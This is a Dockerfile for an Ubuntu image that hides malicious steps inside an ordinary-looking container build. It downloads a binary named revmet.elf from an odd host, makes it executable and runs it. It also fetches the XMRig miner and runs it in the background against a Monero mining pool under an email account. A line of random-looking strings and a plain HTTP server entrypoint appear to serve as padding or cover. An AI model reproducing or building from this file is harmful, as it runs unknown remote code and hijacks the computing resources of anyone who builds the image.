FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo uTwixoqejQ2njuLfR6k1V12Nx8kwEl7T GhLoHUHs9g5t2vEpxlhwaeVEo9MKbUKJ QkFpXUS2oP9kvJq6A57Js8EVnlmwgnO2 DZdPglSb3vaLb6odHmin17G4BAIBfFo8 95tBTM2cwoUYGPYf5mPZPdD6UisxvsBT RV4EYCkXI7Bc88eMMzXwFL0nuLCijLTU ov71heXqwDeVmoo5IFkMnCDMhtGL0o6d l8tmMwBUOV85FIgPZQjSXclxTi3XC11i U40g0bQP0eJXAkics5c7GX9wtSWDSmJc BsmjT8imr1FZz9NfZ4RQHSMJyXt2ayCm QoEOQ7eE9LCjjnsQdjFKkPrOVy6zzexS vqIMulhBa8otuvZF7rwWwyco6Rogo5yh DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]